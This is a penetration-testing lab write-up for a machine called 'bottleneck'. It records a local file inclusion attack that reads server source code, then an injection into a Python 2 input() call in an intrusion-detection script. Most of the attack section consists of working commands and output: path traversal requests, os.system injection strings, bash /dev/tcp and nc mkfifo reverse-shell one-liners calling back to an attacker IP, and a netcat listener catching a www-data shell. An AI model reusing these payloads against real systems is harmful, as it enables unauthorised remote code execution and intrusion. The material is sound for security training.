3 :80 exploit

Using https://github.com/iamkashz/ctf-scripts/blob/main/HTB/bottleneck-lfi.py

$ python3 bottleneck_exploit.py
> Requsting http://192.168.65.22:80/image_gallery.php
http://192.168.65.22:80/image_gallery.php
[!!] exit or quit to return!
File to read: /etc/passwd
[!!] Generating unix time stamp
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629345414', 'f': 'L2V0Yy9wYXNzd2Q='}

Let me throw away your nice request into the bin.
The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?

<pre>
                                   _,..._
                                  /__    \
                                   >< `.  \
                                  /_    \ |
                                   \-_  /:|
                                 ,--'..'. :
                               ,'         `.
                            _,'             \
                   _.._,--''    ,           |
               , ,',, _|    _,.'|      |    |
            \||/,'(,' '--''    |      |    |
       _     |||                |      /-'  |
      | |   (- -)<`._           |     /    /
      | |  \_\O/_/`-.(<<        |____/    /
      | |   /   \              / -'| `--.'|
      | |   \___/             /           /
      | |    H H             /     |     |
      |_|_..-H-H--.._       /     ,|     |
        |-.._"_"__..-|     |   _-/ |     |
        |            |     |    |   \_   |
        |            |     |    |   |    |
        |            |     |____|   |    |
        |            |  _..'    |   |____|
        |            |_(____..._' _.'    |
        `-..______..-'""         (___..--'
<pre>

# requesting image_gallery.php file
File to read: ../image_gallery.php
[!!] Generating unix time stamp
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629345501', 'f': 'Li4vaW1hZ2VfZ2FsbGVyeS5waHA='}
<?php
/*
CHANGELOG
v1.1: Still testing without content.
    I've fixed that problem that @p4w and @ska notified me after hacker attack.
    Shit I'm too lazy to make a big review of my code.
    I think that the LFI problem can be mitigated with the blacklist.
    By the way to protect me from attackers, all malicious requests are immediately sent to the SOC

v1.0: Starting this beautiful gallery
*/

$tstamp = time();
if(isset($_GET['t']) && isset($_GET['f'])){
    include_once 'image_gallery_load.php';
    exit();
}

?>
[trunacted]

# file image_gallery_load.php is loaded; requesting that
<?php
function print_troll(){
    $messages = $GLOBALS['messages'];
    $troll = $GLOBALS['troll'];
    echo $messages[0];
    echo $troll;
}

$troll = <troll-image>

if(!isset($_GET['t']) || !isset($_GET['f'])){
    exit();
}

$imagefile = base64_decode($_GET['f']);
$timestamp = time();
$isblocked = FALSE;
$blacklist = array('/etc','/opt','/var','/opt','/proc','/dev','/lib','/bin','/usr','/home','/ids');
$messages = array("\nLet me throw away your nice request into the bin.\n".
    "The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.\n".
    "Why don't you wait on your chair until someone (maybe the police) knock on your door?\n\n");

if(abs($_GET['t'] - $timestamp) > 10){
    exit();
}
foreach($blacklist as $elem){
    if(strstr($imagefile, $elem) !== FALSE)
        $isblocked = TRUE;
}
// report the intrusion to the soc and save information locally for further investigation
if($isblocked){
    $logfile = 'intrusion_'.$timestamp;
    $fp = fopen('/var/log/soc/'.$logfile, 'w');
    fwrite($fp, "'".$imagefile."'");
    fclose($fp);
    exec('python /opt/ids_strong_bvb.py </var/log/soc/'.$logfile.' >/tmp/output 2>&1');
    print_troll();
    exit();
}
chdir('img');
$filecontent = file_get_contents($imagefile);
if($filecontent === FALSE){
    print_troll();
}
else{
    echo $filecontent;
}
chdir('../');

?>

# this basically tells us if the f and t params are not set, it will exit
# any blacklist path gives and page will not load and troll image is printed
# but if blocked path exec command is run and output is saved to /tmp/output
# reading /tmp/output
File to read: ../../../../../../tmp/output
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629346874', 'f': 'Li4vLi4vLi4vLi4vLi4vLi4vdG1wL291dHB1dA=='}
report: [+] sending the message: /etc/passwd

# after running error file path

File to read: ../../../../../../tmp/output
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629346942', 'f': 'Li4vLi4vLi4vLi4vLi4vLi4vdG1wL291dHB1dA=='}
report: Traceback (most recent call last):
  File "/opt/ids_strong_bvb.py", line 7, in <module>
    data = str(input('report: '))
  File "<string>", line 1
    '/etc/passwd' <?>'
                   ^
SyntaxError: invalid syntax

# input function is taking the str.
# exploiting input in python
# tried
CMD: /etc/passwd' and __import__('os').system('bash -i >& /dev/tcp/192.168.49.65/6969 0>&1')
ERR in /tmp/output: SyntaxError: EOL while scanning string literal
meaning: string ended not properly

CMD: /etc/passwd' and __import__('os').system('bash -i >& /dev/tcp/192.168.49.65/6969 0>&1')#
ERR: sh: 1: Syntax error: Bad fd number

CMD: /etc/passwd' and __import__('os').system('whoami;id')#
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

CMD: /etc/passwd' and __import__('os').system('bash -c \'bash -i >& /dev/tcp/192.168.49.65/6969 0>&1\'')#
CMD: /etc/' and __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.65 6969 >/tmp/f')#

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.49.65] from (UNKNOWN) [192.168.65.22] 37798
bash: cannot set terminal process group (803): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bottleneck:~/html$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bottleneck